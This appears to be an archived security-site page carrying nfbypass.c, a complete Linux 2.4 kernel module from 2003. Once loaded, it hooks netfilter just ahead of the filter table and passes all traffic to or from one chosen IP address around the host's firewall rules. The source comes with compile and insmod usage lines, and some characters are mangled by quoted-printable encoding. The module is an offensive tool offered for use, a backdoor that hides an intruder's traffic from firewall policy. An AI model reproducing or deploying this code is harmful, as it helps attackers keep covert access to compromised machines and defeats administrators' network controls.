evolve or die

nfbypass.c

nfbypass.c
Posted Apr 2, 2003
Authored by truff | Site projet7.org

nfbypass is a Linux kernel module for the 2.4.x series which, when inserted, will bypass netfilter rules.

tags | kernel
systems | linux
MD5 | 76fd7452b1e192965030bbe740138dee

nfbypass.c

Change Mirror Download
/********************************************************\
* nfbypass.c *
* By truff (truff@projet7.org) *
* *
* Linux 2.4.x lkm to bypass netfilter INPUT and *
* OUTPUT rulez *
* *
* Compil: gcc -O2 -c nfbypass.c *
* Usage : insmod nfbypass.o my_ip=3D"xxx.xxx.xxx.xxx" *
* *
* Greetz to #root people and projet7 members @#!% *
* *
* www.projet7.org - Security Researchs - *
\********************************************************/

#define MODULE
#define __KERNEL__


#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/netfilter_ipv4.h>
#include <linux/netfilter_ipv4/ip_tables.h>


u_int32_t my_inet_addr (u_char *address);


static u_char *my_ip =3D NULL;
static u_int32_t my_address;=20
MODULE_PARM (my_ip, "s");

static unsigned int my_hook (unsigned int hook,=20
struct sk_buff **pskb,=20
const struct net_device *indev,=20
const struct net_device *outdev,=20
int (*okfn)(struct sk_buff *))
{
struct iphdr *ip;

ip =3D (struct iphdr *) ((*pskb)->nh.iph);
=20
if (((hook =3D=3D NF_IP_LOCAL_IN) && (ip->saddr =3D=3D my_address)) ||
((hook =3D=3D NF_IP_LOCAL_OUT)&& (ip->daddr =3D=3D my_address)))
{
/*
* OK, we Jump over Netfilter :)
*/
okfn (*pskb);
return NF_STOLEN;
}
else=20
return NF_ACCEPT;
}

static struct nf_hook_ops in_ops =3D {
{NULL, NULL}, my_hook, PF_INET, 0, NF_IP_PRI_FILTER-1
};

static struct nf_hook_ops out_ops =3D {
{NULL, NULL}, my_hook, PF_INET, 0, NF_IP_PRI_FILTER-1
};

int init_module (void)
{
my_address =3D my_inet_addr (my_ip);
=20
in_ops.hooknum =3D NF_IP_LOCAL_IN;
nf_register_hook (&in_ops);

out_ops.hooknum =3D NF_IP_LOCAL_OUT;
nf_register_hook (&out_ops);
=20
return 0;
}


void cleanup_module (void)
{
nf_unregister_hook(&in_ops);
nf_unregister_hook(&out_ops);
}


u_int32_t my_inet_addr (u_char *address)
{
u_int32_t u1, u2, u3, u4;
u_int32_t ip;
char *ptr;

if (address =3D=3D NULL)
return -1;

u1 =3D simple_strtoul (address, &ptr, 10);
u2 =3D simple_strtoul (ptr+1, &ptr, 10);
u3 =3D simple_strtoul (ptr+1, &ptr, 10);
u4 =3D simple_strtoul (ptr+1, &ptr, 10);
=20
ip =3D u4<<24 | u3<<16 | u2<<8 | u1;

return ip;
}


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2012

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    37 Files
  • 2
    May 2nd
    53 Files
  • 3
    May 3rd
    33 Files
  • 4
    May 4th
    4 Files
  • 5
    May 5th
    10 Files
  • 6
    May 6th
    17 Files
  • 7
    May 7th
    19 Files
  • 8
    May 8th
    36 Files
  • 9
    May 9th
    34 Files
  • 10
    May 10th
    35 Files
  • 11
    May 11th
    20 Files
  • 12
    May 12th
    18 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    27 Files
  • 15
    May 15th
    58 Files
  • 16
    May 16th
    54 Files
  • 17
    May 17th
    25 Files
  • 18
    May 18th
    53 Files
  • 19
    May 19th
    9 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    25 Files
  • 22
    May 22nd
    32 Files
  • 23
    May 23rd
    35 Files
  • 24
    May 24th
    26 Files
  • 25
    May 25th
    25 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2012 Packet Storm. All rights reserved.

close